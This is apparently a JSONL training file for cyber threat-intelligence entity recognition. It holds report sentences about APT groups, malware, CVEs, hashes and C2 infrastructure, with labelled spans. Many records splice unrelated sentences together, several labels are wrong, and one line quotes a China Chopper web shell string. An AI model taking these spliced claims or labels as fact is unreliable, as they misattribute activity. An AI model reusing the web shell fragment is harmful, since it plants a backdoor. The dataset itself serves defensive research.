{"text": "While the Dukes employed both hacked websites and purposely rented servers for their C&C infrastructure , the group rarely registered their own domain names , preferring instead to connect to their self- operated servers via IP addresses .", "spans": {"THREAT_ACTOR: Dukes": [[10, 15]], "TOOL: C&C": [[85, 88]]}, "info": {"id": "cyberner_stix_train_007474", "source": "cyberner_stix_train"}}
{"text": "ViperRAT : The Mobile APT Targeting The Israeli Defense Force That Should Be On Your Radar February 16 , 2017 ViperRAT is an active , advanced persistent threat ( APT ) that sophisticated threat actors are actively using to target and spy on the Israeli Defense Force.The threat actors behind the ViperRAT surveillanceware collect a significant amount of sensitive information off of the device , and seem most interested in exfiltrating images and audio content . In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months . ZxShell.dll is injected in a shared SVCHOST process . If an IOC is malicious and the file available to us , Symantec Endpoint products will detect and block that file .", "spans": {"MALWARE: ViperRAT": [[0, 8], [110, 118], [297, 305]], "ORGANIZATION: Israeli Defense Force": [[40, 61]], "ORGANIZATION: Israeli Defense Force.The": [[246, 271]], "FILEPATH: ZxShell.dll": [[571, 582]], "TOOL: SVCHOST": [[607, 614]], "TOOL: Symantec Endpoint products": [[679, 705]]}, "info": {"id": "cyberner_stix_train_007475", "source": "cyberner_stix_train"}}
{"text": "In 2014 , our colleagues at Crowdstrike wrote an exposé about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": {"ORGANIZATION: Crowdstrike": [[28, 39]], "THREAT_ACTOR: APT threat group": [[86, 102]], "THREAT_ACTOR: Putter Panda": [[119, 131]], "ORGANIZATION: Mandiant": [[140, 148]], "ORGANIZATION: FireEye": [[151, 158]], "THREAT_ACTOR: APT2": [[172, 176]], "FILEPATH: BalkanRAT malware": [[200, 217]]}, "info": {"id": "cyberner_stix_train_007477", "source": "cyberner_stix_train"}}
{"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: MSP networks": [[104, 116]], "ORGANIZATION: customers": [[138, 147]], "MALWARE: TRITON": [[228, 234]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[285, 318]]}, "info": {"id": "cyberner_stix_train_007478", "source": "cyberner_stix_train"}}
{"text": "Domain Registration IP address Registration date", "spans": {}, "info": {"id": "cyberner_stix_train_007479", "source": "cyberner_stix_train"}}
{"text": "This runs code in the onCreate ( ) method of the app ’ s MainActivity class , which in effect is the program ’ s entry point . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian government .", "spans": {"THREAT_ACTOR: APT41": [[153, 158]], "ORGANIZATION: Hong Kong media": [[189, 204]], "THREAT_ACTOR: APT28": [[412, 417]], "ORGANIZATION: Russian government": [[425, 443]]}, "info": {"id": "cyberner_stix_train_007480", "source": "cyberner_stix_train"}}
{"text": "We believe PinchDuke ’s credential stealing functionality is based on the source code of the Pinch credential stealing malware ( also known as LdPinch ) that was developed in the early 2000s and has later been openly distributed on underground forums .", "spans": {"MALWARE: PinchDuke": [[11, 20]], "TOOL: Pinch": [[93, 98]], "MALWARE: LdPinch": [[143, 150]]}, "info": {"id": "cyberner_stix_train_007481", "source": "cyberner_stix_train"}}
{"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"SYSTEM: Google Play": [[61, 72]], "MALWARE: Ashas adware": [[112, 124]], "MALWARE: Ploutus-D": [[127, 136]], "THREAT_ACTOR: attackers": [[153, 162]], "TOOL: Flash": [[458, 463]], "VULNERABILITY: CVE-2015-8651": [[466, 479]], "VULNERABILITY: CVE-2016-1019": [[482, 495]], "VULNERABILITY: CVE-2016-4117": [[502, 515]]}, "info": {"id": "cyberner_stix_train_007482", "source": "cyberner_stix_train"}}
{"text": "Subsequent Cobalt Strike C2 servers included subdomains of svchosts . com , svrchost . com , and strust . club .", "spans": {"TOOL: Cobalt Strike": [[11, 24]], "TOOL: C2": [[25, 27]]}, "info": {"id": "cyberner_stix_train_007483", "source": "cyberner_stix_train"}}
{"text": "The Patchwork group continues to plague victims located within the Indian subcontinent . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": {"THREAT_ACTOR: Patchwork group": [[4, 19]], "THREAT_ACTOR: Mofang": [[130, 136]], "ORGANIZATION: government": [[199, 209]], "ORGANIZATION: military": [[212, 220]], "ORGANIZATION: critical infrastructure": [[223, 246]], "ORGANIZATION: automotive": [[255, 265]], "ORGANIZATION: weapon industries": [[270, 287]]}, "info": {"id": "cyberner_stix_train_007484", "source": "cyberner_stix_train"}}
{"text": "China Chopper web shell files named error404.aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": {"TOOL: Chopper": [[6, 13]], "FILEPATH: error404.aspx": [[36, 49]]}, "info": {"id": "cyberner_stix_train_007485", "source": "cyberner_stix_train"}}
{"text": "Reflection Most methods for hiding API usage tend to use Java reflection in some way . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . KeyLog Capture or record the remote computer ’s keystrokes . The code contains the next stage stored as hexadecimal encoded strings and is split into multiple strings so that an antivirus scan would not detect the content as potentially malicious .", "spans": {"ORGANIZATION: Deepen": [[100, 106]], "THREAT_ACTOR: APT6": [[109, 113]], "TOOL: PDF": [[169, 172]], "TOOL: ZIP": [[177, 180]], "MALWARE: SCR file": [[257, 265]]}, "info": {"id": "cyberner_stix_train_007486", "source": "cyberner_stix_train"}}
{"text": "In the samples we analyzed we found the port and C&C information encrypted and hardcoded into the Nidiran malware itself .", "spans": {"TOOL: C&C": [[49, 52]], "MALWARE: Nidiran": [[98, 105]]}, "info": {"id": "cyberner_stix_train_007487", "source": "cyberner_stix_train"}}
{"text": "These resulted in a loader version that would later become known as the “ Nemesis Gemina loader ” due to PDB strings found in many of the samples .", "spans": {"MALWARE: Nemesis Gemina loader": [[74, 95]], "TOOL: PDB": [[105, 108]]}, "info": {"id": "cyberner_stix_train_007488", "source": "cyberner_stix_train"}}
{"text": "After the installation of the trojan , it will wait randomly between three and five minutes to activate one of the native capabilities — these are implemented on the eClient subclass called \" GoogleCC . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: ITG08’s": [[231, 238]], "MALWARE: More_eggs backdoor": [[394, 412]], "THREAT_ACTOR: APT37": [[467, 472]]}, "info": {"id": "cyberner_stix_train_007489", "source": "cyberner_stix_train"}}
{"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry . Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 . Bundles of Data in the Wrong Place \"", "spans": {"ORGANIZATION: energy sector": [[275, 288]], "FILEPATH: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1": [[391, 455]]}, "info": {"id": "cyberner_stix_train_007490", "source": "cyberner_stix_train"}}
{"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64 APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": {"MALWARE: TrickMo": [[257, 264]], "THREAT_ACTOR: APT38": [[364, 369]], "ORGANIZATION: financial institutions": [[491, 513]], "ORGANIZATION: companies": [[660, 669]], "ORGANIZATION: video game and software development industry": [[689, 733]]}, "info": {"id": "cyberner_stix_train_007491", "source": "cyberner_stix_train"}}
{"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"TOOL: Word": [[32, 36]], "VULNERABILITY: CVE-2015-2545": [[147, 160]], "THREAT_ACTOR: attacker": [[194, 202]], "FILEPATH: Catchamas": [[276, 285]], "MALWARE: Trojan": [[298, 304]]}, "info": {"id": "cyberner_stix_train_007492", "source": "cyberner_stix_train"}}
{"text": "FakeSpy uses this view to redirect users to the original post office carrier webpage on launch of the application , continuing the deception . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Gorgon Group used common URL shortening services to download payloads .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT34": [[218, 223]], "TOOL: PowerShell": [[241, 251]], "THREAT_ACTOR: Gorgon Group": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007494", "source": "cyberner_stix_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]], "ORGANIZATION: communications": [[315, 329]], "ORGANIZATION: geospatial imaging": [[332, 350]], "ORGANIZATION: defense sectors": [[357, 372]]}, "info": {"id": "cyberner_stix_train_007495", "source": "cyberner_stix_train"}}
{"text": "This activity spiked in July 2015 , when the group dropped two completely new exploits , an Office and Java zero-day .", "spans": {"TOOL: Office": [[92, 98]], "TOOL: Java": [[103, 107]], "VULNERABILITY: zero-day": [[108, 116]]}, "info": {"id": "cyberner_stix_train_007496", "source": "cyberner_stix_train"}}
{"text": "Actors will often not use exploits due to the fact that researchers can find and eventually patch these which renders the actors weaponized platforms defunct .", "spans": {}, "info": {"id": "cyberner_stix_train_007497", "source": "cyberner_stix_train"}}
{"text": "After that it ’ s necessary to send “ stop_blocker ” to the same number – this will disable the display of HTML pages that extort money and block the screen . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": {"MALWARE: Careto": [[218, 224]], "THREAT_ACTOR: cyber espionage actors": [[349, 371]], "THREAT_ACTOR: TEMP.Periscope": [[408, 422]]}, "info": {"id": "cyberner_stix_train_007498", "source": "cyberner_stix_train"}}
{"text": "Given the connection between WERDLOD and OSX_DOK.C , it is reasonable to assume that the latter is also a part of the Operational Emmental campaign .", "spans": {"MALWARE: WERDLOD": [[29, 36]], "MALWARE: OSX_DOK.C": [[41, 50]]}, "info": {"id": "cyberner_stix_train_007499", "source": "cyberner_stix_train"}}
{"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat . The OilRig group continues to remain a highly active adversary in the Middle East region . The final payload is a remote access tool ( RAT ) written in python . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"SYSTEM: FireEye Mobile Threat Prevention": [[14, 46]], "MALWARE: RuMMS": [[127, 132]], "THREAT_ACTOR: OilRig group": [[189, 201]], "TOOL: remote access tool": [[299, 317]], "TOOL: RAT": [[320, 323]], "TOOL: python": [[337, 343]], "TOOL: Foxit PDF reader": [[364, 380]], "TOOL: Foxit PDF Reader": [[420, 436]], "TOOL: Adobe Acrobat": [[526, 539]]}, "info": {"id": "cyberner_stix_train_007500", "source": "cyberner_stix_train"}}
{"text": "Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"THREAT_ACTOR: MSS": [[116, 119]], "ORGANIZATION: Trend Micro": [[376, 387]], "FILEPATH: espionage toolkit": [[437, 454]], "MALWARE: KeyBoy": [[535, 541]]}, "info": {"id": "cyberner_stix_train_007501", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS MD5 : 45b0e5a457222455384713905f886bd4 .", "spans": {"FILEPATH: 45b0e5a457222455384713905f886bd4": [[19, 51]]}, "info": {"id": "cyberner_stix_train_007502", "source": "cyberner_stix_train"}}
{"text": "This domain was registered on December 20 , 2017 and within a few days was resolving to 92.222.136.105 , which belonged to a well-known VPS provider often used by the Sofacy group .", "spans": {"IP_ADDRESS: 92.222.136.105": [[88, 102]], "TOOL: VPS": [[136, 139]], "THREAT_ACTOR: Sofacy": [[167, 173]]}, "info": {"id": "cyberner_stix_train_007503", "source": "cyberner_stix_train"}}
{"text": "Figure 13 : placeholder classes in Boot module Technical Analysis – Patch Module When “ Agent Smith ” has reached its goal – a malicious payload running inside the original application , with hooks on various methods – at this point , everything lies with maintaining the required code in case of an update for the original application . The attackers began taking them offline in January 2014 . The loader DLL E-TOOL replaces the contents of these processes with the first and second decrypted executables . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"MALWARE: Agent Smith": [[88, 99]], "TOOL: The loader": [[396, 406]], "TOOL: DLL E-TOOL": [[407, 417]], "THREAT_ACTOR: ransomware gangs": [[573, 589]]}, "info": {"id": "cyberner_stix_train_007504", "source": "cyberner_stix_train"}}
{"text": "This also provides a perfect pivot point to hunt for samples .", "spans": {"TOOL: pivot point": [[29, 40]]}, "info": {"id": "cyberner_stix_train_007505", "source": "cyberner_stix_train"}}
{"text": "When you start your device , this script loads the Trojan 'imei_chk ' ( detects it as Android.Oldboot.1 ) which extract two files libgooglekernel.so ( Android.Oldboot.2 ) and GoogleKernel.apk ( Android.Oldboot.1.origin ) , copy them respectively in /system/lib and /system/app . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list . The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 . It decodes the binary and writes it to a Java temporary directory with name “ ntuser.bin ” .", "spans": {"ORGANIZATION: embassy": [[340, 347]]}, "info": {"id": "cyberner_stix_train_007506", "source": "cyberner_stix_train"}}
{"text": "DATA GATHERING Getting a list of all installed applications : Once EventBot is installed on the target machine , it lists all the applications on the target machine and sends them to the C2 . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": {"MALWARE: EventBot": [[67, 75]], "MALWARE: Okrum malware": [[224, 237]], "MALWARE: backdoors": [[330, 339]], "THREAT_ACTOR: APT32": [[369, 374]], "TOOL: emails": [[404, 410]], "FILEPATH: Microsoft ActiveMime file": [[416, 441]]}, "info": {"id": "cyberner_stix_train_007507", "source": "cyberner_stix_train"}}
{"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {"ORGANIZATION: Symantec": [[16, 24]], "THREAT_ACTOR: TEMP.Veles": [[190, 200]], "MALWARE: custom": [[211, 217]], "MALWARE: malware": [[218, 225]], "MALWARE: tailormade credential gathering tools": [[240, 277]]}, "info": {"id": "cyberner_stix_train_007508", "source": "cyberner_stix_train"}}
{"text": "We however do not believe so .", "spans": {}, "info": {"id": "cyberner_stix_train_007509", "source": "cyberner_stix_train"}}
{"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them . w[redacted].livehost.live : 443 . w[redacted].dnslookup.services : 443 . where the redacted part corresponds to the name of the targeted university . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: Poison Ivy": [[253, 263]], "ORGANIZATION: Trend Micro": [[328, 339]], "URL: w[redacted].livehost.live": [[375, 400]], "URL: w[redacted].dnslookup.services": [[409, 439]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[565, 612]]}, "info": {"id": "cyberner_stix_train_007510", "source": "cyberner_stix_train"}}
{"text": "Not long after this variant was public , newer variants of HenBox were seen , and some had significant increases in the number of targeted apps . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": {"MALWARE: HenBox": [[59, 65]], "THREAT_ACTOR: APT41": [[146, 151]], "TOOL: CROSSWALK.BIN": [[161, 174]], "MALWARE: Komplex Trojan": [[248, 262]], "THREAT_ACTOR: Sofacy": [[292, 298]], "MALWARE: Carberp": [[302, 309]], "MALWARE: Trojan": [[318, 324]], "SYSTEM: Windows": [[394, 401]], "TOOL: C2": [[434, 436]]}, "info": {"id": "cyberner_stix_train_007511", "source": "cyberner_stix_train"}}
{"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms . They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]], "ORGANIZATION: technology": [[632, 642]], "ORGANIZATION: Symantec": [[695, 703]], "ORGANIZATION: pharmaceutical firms": [[772, 792]], "ORGANIZATION: MS": [[886, 888]], "TOOL: Office": [[889, 895]], "MALWARE: FakeSG": [[940, 946]], "MALWARE: SocGholish": [[1117, 1127]]}, "info": {"id": "cyberner_stix_train_007512", "source": "cyberner_stix_train"}}
{"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis . This campaign shows us that network-based detection is important but must be completed by system behaviour analysis . KillMilk : Self - Proclaimed Founder of KillNet", "spans": {"THREAT_ACTOR: OilRig group": [[300, 312]], "ORGANIZATION: governmental agencies": [[436, 457]], "ORGANIZATION: businesses": [[462, 472]], "THREAT_ACTOR: KillMilk": [[620, 628]]}, "info": {"id": "cyberner_stix_train_007513", "source": "cyberner_stix_train"}}
{"text": "Cybereason 's investigation shows that the threat actor behind the FakeSpy campaign is a Chinese-speaking group dubbed \" Roaming Mantis '' , a group that has led similar campaigns . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "MALWARE: FakeSpy": [[67, 74]], "ORGANIZATION: Roaming Mantis": [[121, 135]], "THREAT_ACTOR: \bMagic Hound": [[182, 194]], "ORGANIZATION: energy": [[239, 245]], "ORGANIZATION: government": [[248, 258]], "ORGANIZATION: technology": [[265, 275]], "THREAT_ACTOR: Gamaredon Group": [[355, 370]], "ORGANIZATION: dynamic DNS providers": [[416, 437]], "ORGANIZATION: hosting providers": [[518, 535]], "MALWARE: custom-built": [[556, 568]], "MALWARE: malware": [[569, 576]]}, "info": {"id": "cyberner_stix_train_007514", "source": "cyberner_stix_train"}}
{"text": "Decompiled APK resources . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"MALWARE: Word document": [[300, 313]], "FILEPATH: manual.doc": [[314, 324]], "THREAT_ACTOR: Honeybee": [[394, 402]]}, "info": {"id": "cyberner_stix_train_007515", "source": "cyberner_stix_train"}}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "FILEPATH: .exe file": [[149, 158]], "FILEPATH: Microsoft Word file": [[186, 205]]}, "info": {"id": "cyberner_stix_train_007516", "source": "cyberner_stix_train"}}
{"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": {"SYSTEM: Android": [[95, 102]], "THREAT_ACTOR: Bemstour": [[130, 138]], "VULNERABILITY: vulnerabilities": [[160, 175]], "THREAT_ACTOR: BRONZE BUTLER": [[249, 262]]}, "info": {"id": "cyberner_stix_train_007517", "source": "cyberner_stix_train"}}
{"text": "It can also be sold on the dark web and used in various spoofing attacks . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[106, 130]], "THREAT_ACTOR: OilRig group": [[180, 192]], "ORGANIZATION: governmental agencies": [[316, 337]], "ORGANIZATION: businesses": [[342, 352]]}, "info": {"id": "cyberner_stix_train_007518", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "VULNERABILITY: exploit": [[297, 304]], "TOOL: Flash": [[311, 316]], "VULNERABILITY: CVE-2015-5119": [[333, 346]]}, "info": {"id": "cyberner_stix_train_007519", "source": "cyberner_stix_train"}}
{"text": "The OnionDuke toolset includes various modules for purposes such as password stealing , information gathering , denial of service ( DoS ) attacks , and even posting spam to the Russian social media network , VKontakte .", "spans": {"MALWARE: OnionDuke": [[4, 13]], "TOOL: denial of service": [[112, 129]], "TOOL: DoS": [[132, 135]], "TOOL: VKontakte": [[208, 217]]}, "info": {"id": "cyberner_stix_train_007520", "source": "cyberner_stix_train"}}
{"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"ORGANIZATION: WikiLeaks": [[74, 83]], "ORGANIZATION: DNS provider": [[87, 99]], "MALWARE: Perl IRC bot": [[281, 293]], "MALWARE: public IRC chats": [[298, 314]]}, "info": {"id": "cyberner_stix_train_007521", "source": "cyberner_stix_train"}}
{"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": {"THREAT_ACTOR: Gallmaker": [[36, 45]], "TOOL: DDE protocol": [[70, 82]], "ORGANIZATION: TRAC": [[216, 220]]}, "info": {"id": "cyberner_stix_train_007522", "source": "cyberner_stix_train"}}
{"text": "BLU Products has now updated its phones to remove the spying code , which most likely would have never been detected by regular users . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": {"ORGANIZATION: BLU": [[0, 3]], "THREAT_ACTOR: attackers": [[140, 149]], "TOOL: 1.bat": [[242, 247]], "MALWARE: Daserf": [[349, 355]], "FILEPATH: e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51": [[358, 422]]}, "info": {"id": "cyberner_stix_train_007523", "source": "cyberner_stix_train"}}
{"text": "Victims ’ first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . a callback for decompiler events was implemented . Most 51 are due to carelessness , negligence , or compromised credentials , but the potential impact is still present even in an unintentional scenario .", "spans": {"SYSTEM: Android smartphone": [[103, 121]], "THREAT_ACTOR: Gallmaker": [[133, 142]], "VULNERABILITY: compromised credentials": [[388, 411]]}, "info": {"id": "cyberner_stix_train_007524", "source": "cyberner_stix_train"}}
{"text": "Once the event is triggered , it registers a timer . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 .", "spans": {"THREAT_ACTOR: Sofacy group": [[57, 69]], "VULNERABILITY: Flash exploits": [[113, 127]], "TOOL: Carberp": [[145, 152]], "TOOL: JHUHUGIT downloaders": [[159, 179]]}, "info": {"id": "cyberner_stix_train_007525", "source": "cyberner_stix_train"}}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "ORGANIZATION: TAA": [[96, 99]], "ORGANIZATION: telecoms operator": [[130, 147]]}, "info": {"id": "cyberner_stix_train_007526", "source": "cyberner_stix_train"}}
{"text": "However , the botnet operators can start distributing other malware , including ransomware , at any time warns Štefanko . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {"TOOL: LoJax": [[186, 191]], "THREAT_ACTOR: Sednit": [[220, 226]], "THREAT_ACTOR: Lazarus": [[246, 253]]}, "info": {"id": "cyberner_stix_train_007527", "source": "cyberner_stix_train"}}
{"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The earliest use of the exploit ITW we were able to identify and confirm is a sample e228045ef57fb8cc1226b62ada7eee9b dating back to October 2018 ( VirusTotal submission of 2018-10-29 ) with the RTF creation time 2018-10-23 .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[92, 101]], "ORGANIZATION: Anomali": [[104, 111]], "FILEPATH: ITW": [[190, 193], [269, 272]], "VULNERABILITY: exploit": [[209, 216], [261, 268]], "VULNERABILITY: CVE-2018-0798": [[221, 234]], "FILEPATH: e228045ef57fb8cc1226b62ada7eee9b": [[322, 354]], "TOOL: VirusTotal": [[385, 395]], "TOOL: RTF": [[432, 435]]}, "info": {"id": "cyberner_stix_train_007528", "source": "cyberner_stix_train"}}
{"text": "Lotus Blossom targeted the government , higher education , and high tech companies . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "ORGANIZATION: government": [[27, 37]], "ORGANIZATION: higher education": [[40, 56]], "ORGANIZATION: high tech companies": [[63, 82]], "MALWARE: Infy": [[222, 226]]}, "info": {"id": "cyberner_stix_train_007529", "source": "cyberner_stix_train"}}
{"text": "The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign .", "spans": {"TOOL: Bitly": [[33, 38]]}, "info": {"id": "cyberner_stix_train_007530", "source": "cyberner_stix_train"}}
